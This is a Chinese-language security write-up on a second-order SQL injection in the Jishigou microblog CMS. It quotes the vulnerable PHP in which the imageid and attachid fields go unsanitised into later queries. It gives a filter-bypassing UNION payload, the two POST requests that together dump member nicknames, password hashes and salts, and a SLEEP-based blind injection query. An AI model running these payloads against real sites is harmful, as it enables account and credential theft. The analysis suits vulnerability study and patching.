记事狗微博二次注入

测试版本:20140124 1 .分析 文件名:cms.mod.php 函数名:addcms 代码: [php] function addcms(){ if (MEMBER_ID < 1) { response_text("请先登录或者注册一个帐号"); } * master.mod.php : $this->Get = &$_GET; $this->Post = &$_POST; * $aid = trim($this->Post['aid']); //传值 没有过滤操作啥的 $title = trim($this->Post['title']); //传值 没有过滤操作啥的 $catid = trim($this->Post['catid']); //传值 没有过滤操作啥的 $content = trim($this->Post['content']); //传值 没有过滤操作啥的 if(!$content){ $content = $title; } if (!$title){response_text("请输入标题");} if (!$catid){response_text("请选择分类");} if (!$content){response_text("请输入内容");} $imageid = trim($this->Post['imageid']); $attachid = trim($this->Post['attachid']); $data = array( 'title' => $title, 'catid' => $catid, 'content' => $content, 'imageid' => $imageid, 'attachid' => $attachid, ); if($aid > 0){ //aid $return = jlogic('cms')->modify($aid,$data); //修改 }else{ $return = jlogic('cms')->create($data); //创建 我们跟进去看看 } if($return >= 0){ if($aid > 0){ response_text("修改成功"); }else{ $str = $return > 0 ? '发布成功' : '发布成功,请等待管理员审核'; response_text($return."|||".$str."|||".date('Y-m-d H:i:s',time())); } }else{ response_text("操作失败,您没有相关操作权限"); } }[/php] 文件名:cms.logic.php 函数名:create 代码: [php] function create($data) { global $_J; $category = $this->Getonecategory($data['catid']); // 判断cms_category 有没有这个值 /* function Getonecategory($catid=0) { $row = DB::fetch_first("SELECT * FROM ".DB::table('cms_category')." WHERE catid = '$catid'"); return $row; } */ if(MEMBER_ID > 0 && $category && (empty($category['purview']) || in_array($_J['member']['role_id'],explode(',',$category['purview'])) || in_array(MEMBER_ID,explode(',',$category['manageid'])))){ $check = $category['verify'] && !in_array(MEMBER_ID,explode(',',$category['manageid'])) && !in_array($_J['member']['role_id'],explode(',',$category['filter'])) ? 
0 : 1; $cmsdata = array( 'title' => jhtmlspecialchars($data['title']), 'content' => jhtmlspecialchars($data['content']), 'catid' => $data['catid'], 'imageid' => $data['imageid'], //值 'attachid' => $data['attachid'], //值 'likecatid' => $category['likecatid'], ' likemanageid' => $category['manageid'], 'dateline' => time(), 'uid' => MEMBER_ID, 'username' => MEMBER_NICKNAME, 'check' => $check, ); $aid = DB::insert('cms_article', $cmsdata, true); //入库操作 (sql : INSERT INTO jishigou_cms_article SET `title`='test',`content`='test',`catid`='1',`imageid`='143',`attachid`='aaaaaaaaaaaaa',`likecatid`='0',`likemanageid`='',`dateline`='1390917773',`uid`='1',`username`='admin',`check`='1' ) if($data['imageid']){ // 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了 . DB::query("UPDATE ".DB::table('topic_image')." SET item='cms',itemid={$aid} WHERE id IN(".$data['imageid'].")"); } if($data['attachid']){// 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了 DB::query("UPDATE ".DB::table('topic_attach')." SET item='cms',itemid={$aid} WHERE id IN(".$data['attachid'].")"); } if($check>0){ $this->update_cat_count($data['catid'],1,true); } $topicdata = array( 'content' => cut_str($data['content'], 140, ''), 'imageid' => $data['imageid'], //值 'attachid' => $data['attachid'], //值 'item' => 'cms', 'item_id' => $aid, ); jlogic('topic')->Add($topicdata); //代码太长不贴了 最后 imageid和attachid都给get_ids的过滤了 return $check ? $aid : 0; }else{ return -1; } }[/php] 我们在找找谁操作了jishigou_cms_article这个表 文件名:cms.mod.php 函数名:publish 代码: [php] function publish(){ if(MEMBER_ID < 1){ response_text("

错误:请您先登录后再进行该操作!

"); exit; } $aid = jget('aid'); $fromcatid = $catid = jget('catid'); if($aid){ //aid有值进入 $cmsinfo = jlogic('cms')->getarticlebyid($aid); //跟进去 //好我们回来了 $cmsinfo 就是row 值 $uploadimages = $cmsinfo['images']; if(!$cmsinfo['edit']){ response_text("

错误:您没有相关操作权限!

"); exit; } $catid = $cmsinfo['catid']; } $categoryselect = jlogic('cms')->get_category_html($catid); $h_key = 'cms'; $albums = jlogic('image')->getalbum(); include template('cms/publish'); //看这个包含了模版 我们来看看 文件名: \ cms\publish.html //如果有这个变量存在 //循环便利值  
  }[/php] 文件名:cms.logic.php 函数名:getarticlebyid 代码: [php] $row = DB::fetch_first("SELECT * FROM ".DB::table('cms_article')." WHERE aid = '$aid'"); //查询我们发的文章有木有 if($row){ $row['edit'] = (MEMBER_ID > 0 && (MEMBER_ROLE_TYPE == 'admin' || in_array(MEMBER_ID,explode(',',$row['likemanageid'])) || ($row['uid']==MEMBER_ID && !$row['check']))) ? 1 : 0; if($row['imageid']){ 文章有图片id的话就进来 $query = DB::query("SELECT * FROM ".DB::table('topic_image')." WHERE id IN(".$row['imageid'].")"); //看这里用了 $row['imageid']来查询 而我们$row['imageid']是可以控制的 while ($value = DB::fetch($query)){ //以下一些传值操作 $image = str_replace('./','',str_replace('_o.jpg','_s.jpg',$value['photo'])); $row['images'][$value['id']]['img'] = $value['site_url'] ? $value['site_url'].'/'.$image : $image; //传值 } } if($row['attachid']){ 文章有附件id的话就进来 $query = DB::query("SELECT * FROM ".DB::table('topic_attach')." WHERE id IN(".$row['attachid'].")");//看这里用了 $row['attachid'] 来查询 而我们$row['attachid']是可以控制的 $candown = jclass('member')->HasPermission('uploadattach','down'); $canviewtype = array('doc','ppt','pdf','xls','txt','docx','xlsx','pptx'); //以下一些传值操作 while ($value = DB::fetch($query)){ $attach_url = ($value['site_url'] ? $value['site_url'] : $GLOBALS['_J']['site_url']).'/'.str_replace('./','',$value['file']); echo($value); $row['attachs'][$value['id']]['img'] = 'images/filetype/'.$value['filetype'].'.gif'; // $row['attachs'][$value['id']]['name'] = $value['name']; $row['attachs'][$value['id']]['score'] = $value['score']; $row['attachs'][$value['id']]['onlineview'] = ($candown && in_array($value['filetype'],$canviewtype) && $value['score']==0) ? $attach_url : ''; } } } 最后返回 $row 值 (数据库) //[b][color=Red]在看上一个代码 cms.mod.php[/color][/b] return $row; }[/php] 2.利用 因为 程序里面有一系列的限制 检测到 #, -- ,/**/,load_file,hex,substring,substr,ord,char,benchmark,@,intooutfile,intodumpfile,unionselect,unionall,uniondistinct就终止执行了 [php]SELECT * FROM ".DB::table('topic_image')." 
WHERE id IN(".$row['imageid'].")[/php] 我们可以这样 [php] 0)UNION(SELECT 1,2,3,nickname,PASSWORD,1,1,1,1,1,1,1,1,1,1,salt,1 FROM jishigou_members[/php] 来绕过它的限制 好了 第一步先发文章 ajax.php?mod=cms&code=addcms (post提交) [php] title=test&catid=1&aid=0&imageid=143&attachid=0)UNION(SELECT nickname,2,3,4,1,1,1,1,PASSWORD,1,1,1,1,1,1,salt,1 FROM jishigou_members [/php] 由于这个程序里默认是没有文章分类的所有还是有点鸡肋把catid 但是盲注也太慢了! 执行完后会给你个 id 我这边是19 返回信息提示:[php] 19|||发布成功|||2014-01-28 22:58:20 [/php] 我去发不了图片。。 第2步 [php] /ajax.php?mod=cms&code=publish post aid=19 [/php] 密码就显示出来 3.后话 过滤所有的 $imageid $attachid 里面还有其他的盲注也是这两个变量造成的 例如发送私信那里 盲注: [php] SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 43, NULL, SLEEP(1)) FROM jishigou_members[/php]
